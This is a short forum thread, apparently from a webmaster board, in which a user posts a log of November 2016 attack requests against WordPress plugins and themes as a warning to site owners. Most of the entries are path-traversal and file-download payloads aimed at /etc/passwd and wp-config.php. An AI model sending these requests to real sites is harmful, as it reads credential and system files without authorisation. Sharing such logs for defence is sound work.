1. This site uses cookies. By continuing to use this site, you are agreeing to our use of cookies. Learn More.

WP Hack Alert: Nov. 2016

Discussion in 'BlackHat Lounge' started by The Scarlet Pimp, Nov 24, 2016.

  1. The Scarlet Pimp

    The Scarlet Pimp Senior Member

    Joined:
    Apr 2, 2008
    Messages:
    884
    Likes Received:
    3,324
    Occupation:
    Chair moistener.
    Location:
    Cyberspace
    below are the latest hack attempts. if you are running these themes or plugins you should be aware they may have security issues. which is obviously why hackers go after them!

    ---

    Hacker name: 178-137-83-166-broadband.kyivstar.net

    (/wp-content/plugins/formcraft/file-upload/server/php/upload.php)

    (/wp-content/plugins/simple-ads-manager/js/slider/tmpl.js)

    (/wp-content/plugins/recent-backups/download-file.php?file_link=/etc/passwd)

    (/wp-content/plugins/wp-symposium/server/php/ZnPnfKgDiCKoCw.php)

    (/wp-content/plugins/candidate-application-form/downloadpdffile.php?fileName=../../../../../../../../../../etc/passwd)

    (/wp-content/plugins/wptf-image-gallery/lib-mbox/ajax_load.php?url=/etc/passwd)

    (/wp-content/plugins/./simple-image-manipulator/controller/download.php?filepath=/etc/passwd)

    (/wp-content/themes/mTheme-Unus/css/css.php?files=../../../../wp-config.php)

    (/wp-content/plugins/wp-ecommerce-shop-styling/includes/download.php?filename=../../../../../../../../../etc/passwd)
     
  2. blogzandstuff

    blogzandstuff Elite Member

    Joined:
    Jan 1, 2015
    Messages:
    6,422
    Likes Received:
    2,999
    Occupation:
    blog creator
    Location:
    UK
    Although I don't use these myself it's always good to get a heads up on what's going on, thanks op I'll let my clients know